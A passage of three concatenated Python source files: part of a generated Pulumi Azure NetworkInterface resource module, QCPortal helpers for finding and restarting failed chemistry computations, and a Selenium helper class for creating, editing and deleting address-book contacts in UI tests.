def private_ip_addresses(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "private_ip_addresses", value)
@property
@pulumi.getter(name="resourceGroupName")
def resource_group_name(self) -> Optional[pulumi.Input[str]]:
"""
The name of the Resource Group in which to create the Network Interface. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "resource_group_name")
@resource_group_name.setter
def resource_group_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "resource_group_name", value)
@property
@pulumi.getter
def tags(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:
"""
A mapping of tags to assign to the resource.
"""
return pulumi.get(self, "tags")
@tags.setter
def tags(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]):
pulumi.set(self, "tags", value)
@property
@pulumi.getter(name="virtualMachineId")
def virtual_machine_id(self) -> Optional[pulumi.Input[str]]:
"""
The ID of the Virtual Machine which this Network Interface is connected to.
"""
return pulumi.get(self, "virtual_machine_id")
@virtual_machine_id.setter
def virtual_machine_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "virtual_machine_id", value)
class NetworkInterface(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
dns_servers: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
enable_accelerated_networking: Optional[pulumi.Input[bool]] = None,
enable_ip_forwarding: Optional[pulumi.Input[bool]] = None,
internal_dns_name_label: Optional[pulumi.Input[str]] = None,
ip_configurations: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['NetworkInterfaceIpConfigurationArgs']]]]] = None,
location: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
__props__=None):
"""
Manages a Network Interface.
## Example Usage
```python
import pulumi
import pulumi_azure as azure
example_resource_group = azure.core.ResourceGroup("exampleResourceGroup", location="West Europe")
example_virtual_network = azure.network.VirtualNetwork("exampleVirtualNetwork",
address_spaces=["10.0.0.0/16"],
location=example_resource_group.location,
resource_group_name=example_resource_group.name)
example_subnet = azure.network.Subnet("exampleSubnet",
resource_group_name=example_resource_group.name,
virtual_network_name=example_virtual_network.name,
address_prefixes=["10.0.2.0/24"])
example_network_interface = azure.network.NetworkInterface("exampleNetworkInterface",
location=example_resource_group.location,
resource_group_name=example_resource_group.name,
ip_configurations=[azure.network.NetworkInterfaceIpConfigurationArgs(
name="internal",
subnet_id=example_subnet.id,
private_ip_address_allocation="Dynamic",
)])
```
## Import
Network Interfaces can be imported using the `resource id`, e.g.
```sh
$ pulumi import azure:network/networkInterface:NetworkInterface example /subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/mygroup1/providers/Microsoft.Network/networkInterfaces/nic1
```
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[Sequence[pulumi.Input[str]]] dns_servers: A list of IP Addresses defining the DNS Servers which should be used for this Network Interface.
:param pulumi.Input[bool] enable_accelerated_networking: Should Accelerated Networking be enabled? Defaults to `false`.
:param pulumi.Input[bool] enable_ip_forwarding: Should IP Forwarding be enabled? Defaults to `false`.
:param pulumi.Input[str] internal_dns_name_label: The (relative) DNS Name used for internal communications between Virtual Machines in the same Virtual Network.
:param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['NetworkInterfaceIpConfigurationArgs']]]] ip_configurations: One or more `ip_configuration` blocks as defined below.
:param pulumi.Input[str] location: The location where the Network Interface should exist. Changing this forces a new resource to be created.
:param pulumi.Input[str] name: The name of the Network Interface. Changing this forces a new resource to be created.
:param pulumi.Input[str] resource_group_name: The name of the Resource Group in which to create the Network Interface. Changing this forces a new resource to be created.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: A mapping of tags to assign to the resource.
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: NetworkInterfaceArgs,
opts: Optional[pulumi.ResourceOptions] = None):
"""
Manages a Network Interface.
## Example Usage
```python
import pulumi
import pulumi_azure as azure
example_resource_group = azure.core.ResourceGroup("exampleResourceGroup", location="West Europe")
example_virtual_network = azure.network.VirtualNetwork("exampleVirtualNetwork",
address_spaces=["10.0.0.0/16"],
location=example_resource_group.location,
resource_group_name=example_resource_group.name)
example_subnet = azure.network.Subnet("exampleSubnet",
resource_group_name=example_resource_group.name,
virtual_network_name=example_virtual_network.name,
address_prefixes=["10.0.2.0/24"])
example_network_interface = azure.network.NetworkInterface("exampleNetworkInterface",
location=example_resource_group.location,
resource_group_name=example_resource_group.name,
ip_configurations=[azure.network.NetworkInterfaceIpConfigurationArgs(
name="internal",
subnet_id=example_subnet.id,
private_ip_address_allocation="Dynamic",
)])
```
## Import
Network Interfaces can be imported using the `resource id`, e.g.
```sh
$ pulumi import azure:network/networkInterface:NetworkInterface example /subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/mygroup1/providers/Microsoft.Network/networkInterfaces/nic1
```
:param str resource_name: The name of the resource.
:param NetworkInterfaceArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(NetworkInterfaceArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
dns_servers: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
enable_accelerated_networking: Optional[pulumi.Input[bool]] = None,
enable_ip_forwarding: Optional[pulumi.Input[bool]] = None,
internal_dns_name_label: Optional[pulumi.Input[str]] = None,
ip_configurations: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['NetworkInterfaceIpConfigurationArgs']]]]] = None,
location: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = NetworkInterfaceArgs.__new__(NetworkInterfaceArgs)
__props__.__dict__["dns_servers"] = dns_servers
__props__.__dict__["enable_accelerated_networking"] = enable_accelerated_networking
__props__.__dict__["enable_ip_forwarding"] = enable_ip_forwarding
__props__.__dict__["internal_dns_name_label"] = internal_dns_name_label
if ip_configurations is None and not opts.urn:
raise TypeError("Missing required property 'ip_configurations'")
__props__.__dict__["ip_configurations"] = ip_configurations
__props__.__dict__["location"] = location
__props__.__dict__["name"] = name
if resource_group_name is None and not opts.urn:
raise TypeError("Missing required property 'resource_group_name'")
__props__.__dict__["resource_group_name"] = resource_group_name
__props__.__dict__["tags"] = tags
__props__.__dict__["applied_dns_servers"] = None
__props__.__dict__["internal_domain_name_suffix"] = None
__props__.__dict__["mac_address"] = None
__props__.__dict__["private_ip_address"] = None
__props__.__dict__["private_ip_addresses"] = None
__props__.__dict__["virtual_machine_id"] = None
super(NetworkInterface, __self__).__init__(
'azure:network/networkInterface:NetworkInterface',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None,
applied_dns_servers: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
dns_servers: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
enable_accelerated_networking: Optional[pulumi.Input[bool]] = None,
enable_ip_forwarding: Optional[pulumi.Input[bool]] = None,
internal_dns_name_label: Optional[pulumi.Input[str]] = None,
internal_domain_name_suffix: Optional[pulumi.Input[str]] = None,
ip_configurations: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['NetworkInterfaceIpConfigurationArgs']]]]] = None,
location: Optional[pulumi.Input[str]] = None,
mac_address: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
private_ip_address: Optional[pulumi.Input[str]] = None,
private_ip_addresses: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
virtual_machine_id: Optional[pulumi.Input[str]] = None) -> 'NetworkInterface':
"""
Get an existing NetworkInterface resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[Sequence[pulumi.Input[str]]] applied_dns_servers: If the Virtual Machine using this Network Interface is part of an Availability Set, then this list will have the union of all DNS servers from all Network Interfaces that are part of the Availability Set.
:param pulumi.Input[Sequence[pulumi.Input[str]]] dns_servers: A list of IP Addresses defining the DNS Servers which should be used for this Network Interface.
:param pulumi.Input[bool] enable_accelerated_networking: Should Accelerated Networking be enabled? Defaults to `false`.
:param pulumi.Input[bool] enable_ip_forwarding: Should IP Forwarding be enabled? Defaults to `false`.
:param pulumi.Input[str] internal_dns_name_label: The (relative) DNS Name used for internal communications between Virtual Machines in the same Virtual Network.
:param pulumi.Input[str] internal_domain_name_suffix: Even if `internal_dns_name_label` is not specified, a DNS entry is created for the primary NIC of the VM. This DNS name can be constructed by concatenating the VM name with the value of `internal_domain_name_suffix`.
:param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['NetworkInterfaceIpConfigurationArgs']]]] ip_configurations: One or more `ip_configuration` blocks as defined below.
:param pulumi.Input[str] location: The location where the Network Interface should exist. Changing this forces a new resource to be created.
:param pulumi.Input[str] mac_address: The Media Access Control (MAC) Address of the Network Interface.
:param pulumi.Input[str] name: The name of the Network Interface. Changing this forces a new resource to be created.
:param pulumi.Input[str] private_ip_address: The Static IP Address which should be used.
:param pulumi.Input[Sequence[pulumi.Input[str]]] private_ip_addresses: The private IP addresses of the network interface.
:param pulumi.Input[str] resource_group_name: The name of the Resource Group in which to create the Network Interface. Changing this forces a new resource to be created.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: A mapping of tags to assign to the resource.
:param pulumi.Input[str] virtual_machine_id: The ID of the Virtual Machine which this Network Interface is connected to.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = _NetworkInterfaceState.__new__(_NetworkInterfaceState)
__props__.__dict__["applied_dns_servers"] = applied_dns_servers
__props__.__dict__["dns_servers"] = dns_servers
__props__.__dict__["enable_accelerated_networking"] = enable_accelerated_networking
__props__.__dict__["enable_ip_forwarding"] = enable_ip_forwarding
__props__.__dict__["internal_dns_name_label"] = internal_dns_name_label
__props__.__dict__["internal_domain_name_suffix"] = internal_domain_name_suffix
__props__.__dict__["ip_configurations"] = ip_configurations
__props__.__dict__["location"] = location
__props__.__dict__["mac_address"] = mac_address
__props__.__dict__["name"] = name
__props__.__dict__["private_ip_address"] = private_ip_address
__props__.__dict__["private_ip_addresses"] = private_ip_addresses
__props__.__dict__["resource_group_name"] = resource_group_name
__props__.__dict__["tags"] = tags
__props__.__dict__["virtual_machine_id"] = virtual_machine_id
return NetworkInterface(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter(name="appliedDnsServers")
def applied_dns_servers(self) -> pulumi.Output[Sequence[str]]:
"""
If the Virtual Machine using this Network Interface is part of an Availability Set, then this list will have the union of all DNS servers from all Network Interfaces that are part of the Availability Set.
"""
return pulumi.get(self, "applied_dns_servers")
@property
@pulumi.getter(name="dnsServers")
def dns_servers(self) -> pulumi.Output[Sequence[str]]:
"""
A list of IP Addresses defining the DNS Servers which should be used for this Network Interface.
"""
return pulumi.get(self, "dns_servers")
@property
@pulumi.getter(name="enableAcceleratedNetworking")
def enable_accelerated_networking(self) -> pulumi.Output[Optional[bool]]:
"""
Should Accelerated Networking be enabled? Defaults to `false`.
"""
return pulumi.get(self, "enable_accelerated_networking")
@property
@pulumi.getter(name="enableIpForwarding")
def enable_ip_forwarding(self) -> pulumi.Output[Optional[bool]]:
"""
Should IP Forwarding be enabled? Defaults to `false`.
"""
return pulumi.get(self, "enable_ip_forwarding")
@property
@pulumi.getter(name="internalDnsNameLabel")
def internal_dns_name_label(self) -> pulumi.Output[str]:
"""
The (relative) DNS Name used for internal communications between Virtual Machines in the same Virtual Network.
"""
return pulumi.get(self, "internal_dns_name_label")
@property
@pulumi.getter(name="internalDomainNameSuffix")
def internal_domain_name_suffix(self) -> pulumi.Output[str]:
"""
Even if `internal_dns_name_label` is not specified, a DNS entry is created for the primary NIC of the VM. This DNS name can be constructed by concatenating the VM name with the value of `internal_domain_name_suffix`.
"""
return pulumi.get(self, "internal_domain_name_suffix")
@property
@pulumi.getter(name="ipConfigurations")
def ip_configurations(self) -> pulumi.Output[Sequence['outputs.NetworkInterfaceIpConfiguration']]:
"""
One or more `ip_configuration` blocks as defined below.
"""
return pulumi.get(self, "ip_configurations")
@property
@pulumi.getter
def location(self) -> pulumi.Output[str]:
"""
The location where the Network Interface should exist. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "location")
@property
@pulumi.getter(name="macAddress")
def mac_address(self) -> pulumi.Output[str]:
"""
The Media Access Control (MAC) Address of the Network Interface.
"""
return pulumi.get(self, "mac_address")
@property
@pulumi.getter
def name(self) -> pulumi.Output[str]:
"""
The name of the Network Interface. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "name")
@property
@pulumi.getter(name="privateIpAddress")
def private_ip_address(self) -> pulumi.Output[str]:
"""
The Static IP Address which should be used.
"""
return pulumi.get(self, "private_ip_address")
@property
@pulumi.getter(name="privateIpAddresses")
def private_ip_addresses(self) -> pulumi.Output[Sequence[str]]:
"""
The private IP addresses of the network interface.
"""
return pulumi.get(self, "private_ip_addresses")
@property
@pulumi.getter(name="resourceGroupName")
def resource_group_name(self) -> pulumi.Output[str]:
"""
The name of the Resource Group in which to create the Network Interface. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "resource_group_name")
@property
@pulumi.getter
def tags(self) -> pulumi.Output[Optional[Mapping[str, str]]]:
"""
A mapping of tags to assign to the resource.
"""
return pulumi.get(self, "tags")
@property
@pulumi.getter(name="virtualMachineId")
def virtual_machine_id(self) -> pulumi.Output[str]:
"""
The ID of the Virtual Machine which this Network Interface is connected to.
"""
return pulumi.get(self, "virtual_machine_id")
|
from collections import defaultdict, Counter
import qcportal as ptl
## failures and incompletes
def get_optimizations(dataset, spec, client, dropna=False):
ds = dataset
    # retry until the status query succeeds; avoid a bare except so that
    # KeyboardInterrupt/SystemExit are not silently swallowed
    while True:
        try:
            ds.status(spec)
        except Exception:
            pass
        else:
            break
if dropna:
df = ds.df.dropna()
else:
df = ds.df
ids = list(set(i.id for i in df[spec]))
res = _query_procedures(ids, client)
return res
def get_unfinished_optimizations(dataset, spec, client, dropna=False):
res = get_optimizations(dataset, spec, client, dropna=dropna)
res = [opt for opt in res if opt.status != 'COMPLETE']
return res
def _query_procedures(ids, client):
res = []
ids = list(ids)
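    # query in chunks of 1000 ids at a time (presumably to stay within the
    # server-side limit on the number of ids per query)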
for i in range(0,len(ids),1000):
ids_i = ids[i:i+1000]
res_i = client.query_procedures(ids_i)
res.extend(res_i)
return res
def get_torsiondrives(
dataset, spec, client, noncomplete=False):
ds = dataset
    # retry until the status query succeeds (see note in get_optimizations)
    while True:
        try:
            ds.status(spec)
        except Exception:
            pass
        else:
            break
return ds.df[spec].tolist()
def get_torsiondrive_optimizations(
dataset, spec, client, noncomplete=False):
ds = dataset
    # retry until the status query succeeds (see note in get_optimizations)
    while True:
        try:
            ds.status(spec)
        except Exception:
            pass
        else:
            break
optimizations = defaultdict(set)
for tdr in ds.df[spec]:
for val in tdr.optimization_history.values():
optimizations[tdr.id].update(set(val))
res_opt = {key: _query_procedures(value, client) for key, value in optimizations.items()}
if noncomplete:
res_opt = {key: [opt for opt in value if opt.status != 'COMPLETE']
for key, value in res_opt.items()}
return res_opt
def get_unfinished_torsiondrive_optimizations(
dataset, spec, client, noncomplete=False):
res_opt = get_torsiondrive_optimizations(dataset, spec, client, noncomplete=noncomplete)
ds = dataset
for tdr in ds.df[spec]:
if tdr.status == 'COMPLETE':
res_opt.pop(tdr.id, None)
return res_opt
def merge(datadict):
    seen_ids = set()
    res = list()
    for val in datadict.values():
        # only keep records whose ids have not appeared in a previous value
        new_ids = set(i.id for i in val) - seen_ids
        res.extend([i for i in val if i.id in new_ids])
        seen_ids.update(new_ids)
    return res
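# Minimal sketch of what merge() does; the record class below is a stand-in for
# QCPortal records, which only need an `.id` attribute here.
def _example_merge():
    class _Rec:
        def __init__(self, id):
            self.id = id
    data = {"tdr1": [_Rec("a"), _Rec("b")], "tdr2": [_Rec("b"), _Rec("c")]}
    # returns ["a", "b", "c"]: the duplicate "b" from the second entry is dropped
    return [record.id for record in merge(data)]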
## error messages
def get_unique_optimization_error_messages(optimizations, full=False):
if full:
return set(opt.get_error().error_message
for opt in optimizations if opt.status == 'ERROR')
else:
return set(opt.get_error().error_message.split('\n')[-2]
for opt in optimizations if opt.status == 'ERROR')
def count_unique_optimization_error_messages(
optimizations, full=False, pretty_print=False, tolerate_missing=False):
errors = Counter()
for opt in optimizations:
if opt.status != 'ERROR':
continue
err_content = opt.get_error()
if tolerate_missing:
if err_content is None:
errors += Counter({None: 1})
continue
if full:
errors += Counter({err_content.error_message: 1})
else:
errors += Counter({err_content.error_message.split('\n')[-2]: 1})
errors = dict(errors)
content = ""
if pretty_print:
for key, value in errors.items():
content += f"There are {value} instances of\n"
content += '-------------------------------------\n'
content += f'{key}\n'
content += '-------------------------------------\n'
return content
else:
return errors
## restarts
def restart_optimizations(optimizations, client):
for opt in optimizations:
if opt.status == 'ERROR':
print(opt)
client.modify_tasks(operation='restart', base_result=opt.id)
def restart_torsiondrives(torsiondrives, client):
for tdr in torsiondrives:
if tdr.status == 'ERROR':
print(tdr)
client.modify_services('restart', procedure_id=tdr.id)
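# Example workflow (illustrative; the dataset name and specification are
# placeholders and a live QCFractal server connection is required):
#
#   client = ptl.FractalClient()
#   ds = client.get_collection("OptimizationDataset", "My Dataset")
#   unfinished = get_unfinished_optimizations(ds, "default", client)
#   print(count_unique_optimization_error_messages(
#       unfinished, pretty_print=True, tolerate_missing=True))
#   restart_optimizations(unfinished, client)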
|
from model.contact import Contact
import re
class ContactHelper:
def __init__(self, app):
self.app = app
def open_contacts_page(self):
# open groups page
wd = self.app.wd
wd.find_element_by_link_text("home").click()
def create_contact(self, Contact):
wd = self.app.wd
self.open_contacts_page()
# init contact creation
wd.find_element_by_link_text("add new").click()
# fill contact info
wd.find_element_by_name("firstname").click()
wd.find_element_by_name("firstname").clear()
wd.find_element_by_name("firstname").send_keys(Contact.firstname)
wd.find_element_by_name("middlename").click()
wd.find_element_by_name("middlename").clear()
wd.find_element_by_name("middlename").send_keys(Contact.middlename)
wd.find_element_by_name("lastname").click()
wd.find_element_by_name("lastname").clear()
wd.find_element_by_name("lastname").send_keys(Contact.lastname)
wd.find_element_by_name("nickname").click()
wd.find_element_by_name("nickname").clear()
wd.find_element_by_name("nickname").send_keys(Contact.nickname)
wd.find_element_by_name("title").click()
wd.find_element_by_name("title").clear()
wd.find_element_by_name("title").send_keys(Contact.title)
wd.find_element_by_name("company").click()
wd.find_element_by_name("company").clear()
wd.find_element_by_name("company").send_keys(Contact.company)
wd.find_element_by_name("address").click()
wd.find_element_by_name("address").clear()
wd.find_element_by_name("address").send_keys(Contact.address)
wd.find_element_by_name("home").click()
wd.find_element_by_name("home").clear()
wd.find_element_by_name("home").send_keys(Contact.home)
wd.find_element_by_name("mobile").click()
wd.find_element_by_name("mobile").clear()
wd.find_element_by_name("mobile").send_keys(Contact.mobile)
wd.find_element_by_name("work").click()
wd.find_element_by_name("work").clear()
wd.find_element_by_name("work").send_keys(Contact.work)
wd.find_element_by_name("fax").click()
wd.find_element_by_name("fax").clear()
wd.find_element_by_name("fax").send_keys(Contact.fax)
wd.find_element_by_name("email").click()
wd.find_element_by_name("email").clear()
wd.find_element_by_name("email").send_keys(Contact.email)
wd.find_element_by_name("email2").click()
wd.find_element_by_name("email2").clear()
wd.find_element_by_name("email2").send_keys(Contact.email2)
wd.find_element_by_name("email3").click()
wd.find_element_by_name("email3").clear()
wd.find_element_by_name("email3").send_keys(Contact.email3)
wd.find_element_by_name("homepage").click()
wd.find_element_by_name("homepage").clear()
wd.find_element_by_name("homepage").send_keys(Contact.homepage)
if not wd.find_element_by_xpath("//div[@id='content']/form/select[1]//option[3]").is_selected():
wd.find_element_by_xpath("//div[@id='content']/form/select[1]//option[3]").click()
if not wd.find_element_by_xpath("//div[@id='content']/form/select[2]//option[3]").is_selected():
wd.find_element_by_xpath("//div[@id='content']/form/select[2]//option[3]").click()
wd.find_element_by_name("byear").click()
wd.find_element_by_name("byear").clear()
wd.find_element_by_name("byear").send_keys(Contact.byear)
if not wd.find_element_by_xpath("//div[@id='content']/form/select[3]//option[3]").is_selected():
wd.find_element_by_xpath("//div[@id='content']/form/select[3]//option[3]").click()
if not wd.find_element_by_xpath("//div[@id='content']/form/select[4]//option[3]").is_selected():
wd.find_element_by_xpath("//div[@id='content']/form/select[4]//option[3]").click()
wd.find_element_by_name("ayear").click()
wd.find_element_by_name("ayear").clear()
wd.find_element_by_name("ayear").send_keys(Contact.ayear)
wd.find_element_by_name("theform").click()
wd.find_element_by_name("address2").click()
wd.find_element_by_name("address2").clear()
wd.find_element_by_name("address2").send_keys(Contact.address2)
wd.find_element_by_name("phone2").click()
wd.find_element_by_name("phone2").clear()
wd.find_element_by_name("phone2").send_keys(Contact.phone2)
wd.find_element_by_name("notes").click()
wd.find_element_by_name("notes").clear()
wd.find_element_by_name("notes").send_keys(Contact.notes)
# submit contact creation
wd.find_element_by_xpath("//div[@id='content']/form/input[21]").click()
self.contact_cache = None
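    # Example (illustrative; assumes `app` wraps a Selenium WebDriver as above
    # and that the Contact model accepts these fields as keyword arguments):
    #
    #   helper = ContactHelper(app)
    #   helper.create_contact(Contact(firstname="John", lastname="Doe",
    #                                 mobile="+1234567890",
    #                                 email="john@example.com"))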
def delete_first_contact(self):
self.delete_contact_by_index(0)
def delete_contact_by_index(self,index):
wd = self.app.wd
self.open_contacts_page()
wd.find_elements_by_name("selected[]")[index].click()
wd.find_element_by_xpath("//div[@id='content']/form[2]/div[2]/input").click()
wd.switch_to_alert().accept()
self.contact_cache = None
def delete_contact_by_id(self,id):
wd = self.app.wd
self.open_contacts_page()
wd.find_element_by_css_selector("input[value=\"%s\"]" % id).click()
wd.find_element_by_xpath("//div[@id='content']/form[2]/div[2]/input").click()
wd.switch_to_alert().accept()
self.contact_cache = None
def mod_first_contact(self, Contact):
self.mod_contact_by_index(0, Contact)
def mod_contact_by_index(self, index, Contact):
wd = self.app.wd
self.open_contacts_page()
wd.find_elements_by_name("selected[]")[index].click()
#wd.find_element_by_xpath("//table[@id='maintable']/tbody/tr[2]/td[8]/a/img").click()
wd.find_elements_by_xpath("//img[@title='Edit']")[index].click()
wd.find_element_by_name("firstname").click()
wd.find_element_by_name("firstname").clear()
wd.find_element_by_name("firstname").send_keys(Contact.firstname)
wd.find_element_by_name("middlename").click()
wd.find_element_by_name("middlename").clear()
wd.find_element_by_name("middlename").send_keys(Contact.middlename)
wd.find_element_by_name("lastname").click()
wd.find_element_by_name("lastname").clear()
wd.find_element_by_name("lastname").send_keys(Contact.lastname)
wd.find_element_by_name("nickname").click()
wd.find_element_by_name("nickname").clear()
wd.find_element_by_name("nickname").send_keys(Contact.nickname)
wd.find_element_by_name("company").click()
wd.find_element_by_name("company").clear()
wd.find_element_by_name("company").send_keys(Contact.company)
wd.find_element_by_name("title").click()
wd.find_element_by_name("title").clear()
wd.find_element_by_name("title").send_keys(Contact.title)
wd.find_element_by_name("address").click()
wd.find_element_by_name("address").clear()
wd.find_element_by_name("address").send_keys(Contact.address)
wd.find_element_by_name("home").click()
wd.find_element_by_name("home").clear()
wd.find_element_by_name("home").send_keys(Contact.home)
wd.find_element_by_name("mobile").click()
wd.find_element_by_name("mobile").send_keys(Contact.mobile)
wd.find_element_by_name("mobile").click()
wd.find_element_by_name("mobile").clear()
wd.find_element_by_name("mobile").send_keys(Contact.mobile)
wd.find_element_by_name("work").click()
wd.find_element_by_name("work").clear()
wd.find_element_by_name("work").send_keys(Contact.work)
wd.find_element_by_name("fax").click()
wd.find_element_by_name("fax").clear()
wd.find_element_by_name("fax").send_keys(Contact.fax)
wd.find_element_by_name("email").click()
wd.find_element_by_name("email").clear()
wd.find_element_by_name("email").send_keys(Contact.email)
wd.find_element_by_name("email2").click()
wd.find_element_by_name("email2").clear()
wd.find_element_by_name("email2").send_keys(Contact.email2)
wd.find_element_by_name("email3").click()
wd.find_element_by_name("email3").clear()
wd.find_element_by_name("email3").send_keys(Contact.email3)
wd.find_element_by_name("homepage").click()
wd.find_element_by_name("homepage").clear()
wd.find_element_by_name("homepage").send_keys(Contact.homepage)
wd.find_element_by_name("byear").click()
wd.find_element_by_name("byear").clear()
wd.find_element_by_name("byear").send_keys(Contact.byear)
wd.find_element_by_name("byear").click()
wd.find_element_by_name("byear").clear()
wd.find_element_by_name("byear").send_keys(Contact.byear)
wd.find_element_by_name("ayear").click()
wd.find_element_by_name("ayear").clear()
wd.find_element_by_name("ayear").send_keys(Contact.ayear)
wd.find_element_by_name("address2").click()
wd.find_element_by_name("address2").clear()
wd.find_element_by_name("address2").send_keys(Contact.address2)
wd.find_element_by_name("phone2").click()
wd.find_element_by_name("phone2").clear()
wd.find_element_by_name("phone2").send_keys(Contact.phone2)
wd.find_element_by_name("notes").click()
wd.find_element_by_name("notes").clear()
wd.find_element_by_name("notes").send_keys(Contact.notes)
wd.find_element_by_xpath("//div[@id='content']/form[1]/input[22]").click()
self.contact_cache = None
def mod_contact_by_id(self, id, Contact):
wd = self.app.wd
self.open_contacts_page()
checkbox=wd.find_element_by_css_selector("input[value=\"%s\"]" % id)
#checkbox = self.select_contact_by_id()
# Find row of this checkbox
row = checkbox.find_element_by_xpath("./../..")
# Click on "Edit" picture
row.find_elements_by_css_selector("td")[7].click()
#wd.find_element_by_xpath("//table[@id='maintable']/tbody/tr[2]/td[8]/a/img").click()
#wd.find_elements_by_xpath("//img[@title='Edit']")[index].click()
wd.find_element_by_name("firstname").click()
wd.find_element_by_name("firstname").clear()
wd.find_element_by_name("firstname").send_keys(Contact.firstname)
wd.find_element_by_name("middlename").click()
wd.find_element_by_name("middlename").clear()
wd.find_element_by_name("middlename").send_keys(Contact.middlename)
wd.find_element_by_name("lastname").click()
wd.find_element_by_name("lastname").clear()
wd.find_element_by_name("lastname").send_keys(Contact.lastname)
wd.find_element_by_name("nickname").click()
wd.find_element_by_name("nickname").clear()
wd.find_element_by_name("nickname").send_keys(Contact.nickname)
wd.find_element_by_name("company").click()
wd.find_element_by_name("company").clear()
wd.find_element_by_name("company").send_keys(Contact.company)
wd.find_element_by_name("title").click()
wd.find_element_by_name("title").clear()
wd.find_element_by_name("title").send_keys(Contact.title)
wd.find_element_by_name("address").click()
wd.find_element_by_name("address").clear()
wd.find_element_by_name("address").send_keys(Contact.address)
wd.find_element_by_name("home").click()
wd.find_element_by_name("home").clear()
wd.find_element_by_name("home").send_keys(Contact.home)
wd.find_element_by_name("mobile").click()
wd.find_element_by_name("mobile").send_keys(Contact.mobile)
wd.find_element_by_name("mobile").click()
wd.find_element_by_name("mobile").clear()
wd.find_element_by_name("mobile").send_keys(Contact.mobile)
wd.find_element_by_name("work").click()
wd.find_element_by_name("work").clear()
wd.find_element_by_name("work").send_keys(Contact.work)
wd.find_element_by_name("fax").click()
wd.find_element_by_name("fax").clear()
wd.find_element_by_name("fax").send_keys(Contact.fax)
wd.find_element_by_name("email").click()
wd.find_element_by_name("email").clear()
wd.find_element_by_name("email").send_keys(Contact.email)
wd.find_element_by_name("email2").click()
wd.find_element_by_name("email2").clear()
wd.find_element_by_name("email2").send_keys(Contact.email2)
wd.find_element_by_name("email3").click()
wd.find_element_by_name("email3").clear()
wd.find_element_by_name("email3").send_keys(Contact.email3)
wd.find_element_by_name("homepage").click()
wd.find_element_by_name("homepage").clear()
wd.find_element_by_name("homepage").send_keys(Contact.homepage)
wd.find_element_by_name("byear").click()
wd.find_element_by_name("byear").clear()
wd.find_element_by_name("byear").send_keys(Contact.byear)
wd.find_element_by_name("byear").click()
wd.find_element_by_name("byear").clear()
wd.find_element_by_name("byear").send_keys(Contact.byear)
wd.find_element_by_name("ayear").click()
wd.find_element_by_name("ayear").clear()
wd.find_element_by_name("ayear").send_keys(Contact.ayear)
wd.find_element_by_name("address2").click()
wd.find_element_by_name("address2").clear()
wd.find_element_by_name("address2").send_keys(Contact.address2)
wd.find_element_by_name("phone2").click()
wd.find_element_by_name("phone2").clear()
wd.find_element_by_name("phone2").send_keys(Contact.phone2)
wd.find_element_by_name("notes").click()
wd.find_element_by_name("notes").clear()
wd.find_element_by_name("notes").send_keys(Contact.notes)
wd.find_element_by_xpath("//div[@id='content']/form[1]/input[22]").click()
self.contact_cache = None
def count_contact(self):
wd = self.app.wd
self.open_contacts_page()
return len(wd.find_elements_by_name("selected[]"))
contact_cache = None
def get_contact_list(self):
if self.contact_cache is None:
wd = self.app.wd
self.open_contacts_page()
self.contact_cache=[]
for element in wd.find_elements_by_name("entry"):
strs = element.find_elements_by_tag_name("td")
